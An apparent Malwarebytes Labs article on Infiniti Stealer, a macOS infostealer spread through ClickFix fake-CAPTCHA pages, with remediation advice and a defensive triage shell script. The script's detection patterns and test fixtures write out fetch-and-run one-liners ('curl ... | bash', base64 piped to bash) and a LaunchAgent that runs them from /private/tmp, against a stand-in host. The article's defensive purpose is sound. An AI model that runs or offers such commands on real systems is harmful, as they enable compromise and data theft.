Infiniti Stealer - New macOS Infostealer Emerges
Basically, a new strain of macOS malware tricks Mac users into running a command that steals their data.
A new macOS infostealer called Infiniti Stealer tricks users into pasting and running a malicious command themselves. Once it runs, it can harvest browser credentials, Keychain entries, cryptocurrency wallets and other sensitive data from the Mac. The simplest defence is a firm rule: never paste a command from a web page into Terminal.
What Happened
A new macOS infostealer has emerged, initially tracked as NukeChain but now identified as Infiniti Stealer. It steals sensitive data from Macs using a social-engineering technique called ClickFix. Instead of exploiting a software vulnerability, it deceives users into executing a malicious command themselves: a fake CAPTCHA page that mimics a legitimate verification step tells the visitor to copy a command and run it in Terminal. This approach is dangerous because the victim does the attacker's work. There is no exploit for a patch to close, the usual Gatekeeper prompt for downloaded apps never appears because nothing was downloaded through the browser, and whatever the command launches runs with the same access to files, browsers and keychains that the logged-in user already has.
The malware is written in Python and compiled with Nuitka, which translates Python into C and builds it into a native macOS binary. A Nuitka-compiled binary bundles its own Python runtime, so it runs on Macs without Python installed, and its logic is harder to recover than the bytecode inside a typical PyInstaller bundle, which slows both detection and analysis. This is the first documented campaign to pair ClickFix with a Nuitka-compiled Python stealer, a notable step in the evolution of malware tactics against Mac users.
Who's Being Targeted
Infiniti Stealer targets macOS users, a population that has often assumed its systems are less exposed to malware. That assumption is being overtaken by increasingly sophisticated attacks. The malware is distributed through a deceptive page hosted on update-check[.]com that instructs visitors to run a command in Terminal. Because the victim launches the payload directly, defences that key on exploit behaviour or on files downloaded by the browser never get a chance to intervene.
The social-engineering technique is the same ClickFix pattern previously used against Windows users, where the fake CAPTCHA commonly asks the victim to paste a command into the Run dialog. Its adaptation to macOS shows attackers broadening their scope to match the growing Apple user base. The potential impact is significant, because many users do not realise that running a command copied from an untrusted website is just as dangerous as opening an untrusted executable.
Signs of Infection
Once executed, the malware runs a multi-stage infection chain. The first stage is a Bash dropper that decodes and executes the second stage, a Nuitka-compiled binary. That binary gathers a wide range of sensitive information, including:
- Credentials from browsers like Chrome and Firefox
- macOS Keychain entries
- Cryptocurrency wallet information
- Plaintext secrets from developer files
- Screenshots captured during execution
The malware also checks for known analysis environments, such as sandboxes and virtual machines, so that it can avoid running where it would be observed, which complicates efforts to analyse it and build detections. Victims typically notice nothing unusual: the pasted command appears to do nothing beyond "verifying" them, while their credentials are already being exfiltrated.
How to Protect Yourself
If you suspect that your Mac may have been compromised by Infiniti Stealer, immediate action is crucial. Here are some recommended steps:
- Stop using the device for sensitive activities like banking or accessing work accounts.
- Change your passwords on a clean device, starting with critical accounts such as email and banking.
- Revoke active sessions and rotate API tokens, SSH keys and any other secrets stored on the machine; the stealer reads plaintext secrets from developer files, so treat everything in dotfiles and project configs as exposed.
- Check for suspicious files and persistence in directories like /tmp and ~/Library/LaunchAgents, and review your shell history for the command you pasted.
- Run a full malware scan using a reputable tool like Malwarebytes to detect and remove any malicious software.
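The two checks above (shell history and launch items) can be scripted for a first-pass triage. The script below is an added example written for this page, not Malwarebytes tooling and not a set of confirmed Infiniti Stealer indicators: the patterns it looks for are generic assumptions about what ClickFix one-liners and malicious LaunchAgents tend to contain (a download or a base64 decode piped straight into a shell, launch items that run from /tmp or hidden directories or invoke curl, base64, osascript or a shell). It runs against constructed sample files so it works anywhere; on a real Mac, point the functions at ~/.zsh_history, ~/.bash_history, ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons.

```shell
#!/bin/sh
# Added triage helpers (example code, not Malwarebytes' tooling).
# Indicator patterns are heuristic assumptions, not confirmed IOCs.

# ClickFix-style droppers: remote script piped into a shell, or an
# embedded blob decoded and executed, or a long echo'd base64 blob.
CLICKFIX_RE='(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh|base64[[:space:]]+(-d|--decode|-D)[^|]*\|[[:space:]]*(ba|z)?sh|echo[[:space:]]+[A-Za-z0-9+/=]{40,}'

# Things a benign launch item rarely does: run from /tmp or a hidden
# directory, or invoke a downloader, decoder, scripting host or shell.
LAUNCH_RE='/tmp/|/private/tmp/|/\.[A-Za-z0-9_]+/|curl|wget|base64|osascript|(ba|z)?sh[[:space:]]+-c|python'

# scan_history FILE: print matching commands; return 0 if any matched.
scan_history() {
    [ -r "$1" ] || return 1
    # zsh extended history prefixes each line with ": <epoch>:<dur>;"
    sed 's/^: [0-9]*:[0-9]*;//' "$1" | grep -E "$CLICKFIX_RE"
}

# scan_launch_items DIR: print "plist<TAB>matched strings" per hit;
# return 0 if any .plist in DIR matched. grep -a copes with binary plists.
scan_launch_items() {
    dir=$1
    hits=0
    [ -d "$dir" ] || return 1
    for plist in "$dir"/*.plist; do
        [ -f "$plist" ] || continue
        if grep -aEq "$LAUNCH_RE" "$plist"; then
            printf '%s\t%s\n' "$plist" \
                "$(grep -aEo "$LAUNCH_RE" "$plist" | sort -u | tr '\n' ' ')"
            hits=1
        fi
    done
    [ "$hits" -eq 1 ]
}

# make_fixtures DIR: write constructed samples (not real artefacts) so the
# checks can be exercised offline. The base64 blob decodes to 33 'A's.
make_fixtures() {
    mkdir -p "$1/LaunchAgents"
    cat > "$1/zsh_history" <<'EOF'
: 1700000000:0;ls -la ~/Library/LaunchAgents
: 1700000001:0;brew update && brew upgrade
: 1700000002:0;echo 'QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB' | base64 -d | bash
: 1700000003:0;curl -fsSL https://example.invalid/verify | bash
EOF
    cat > "$1/LaunchAgents/com.example.syncagent.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.syncagent</string>
  <key>ProgramArguments</key>
  <array><string>/Applications/SyncAgent.app/Contents/MacOS/SyncAgent</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>
EOF
    cat > "$1/LaunchAgents/com.example.updater.plist" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key>
  <array><string>/bin/bash</string><string>-c</string>
  <string>curl -fsSL https://example.invalid/s | bash</string></array>
  <key>RunAtLoad</key><true/>
  <key>WorkingDirectory</key><string>/private/tmp/.cache/</string>
</dict></plist>
EOF
}

# Demo run against the constructed fixtures.
DEMO=$(mktemp -d)
make_fixtures "$DEMO"
echo "== shell history =="
scan_history "$DEMO/zsh_history" || echo "(no hits)"
echo "== launch items =="
scan_launch_items "$DEMO/LaunchAgents" || echo "(no hits)"
rm -rf "$DEMO"
```

A hit from scan_history is not proof of compromise (developers legitimately pipe installers into bash), but it tells you exactly which command was run and when, which is the starting point for working out what the second stage was. A LaunchAgent flagged by scan_launch_items should be read in full with plutil -p before deciding whether to unload and delete it.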
It's essential to remember that no legitimate CAPTCHA will ever require you to paste commands into your Terminal. Stay vigilant and avoid executing any commands from untrusted websites to protect your data.
Malwarebytes Labs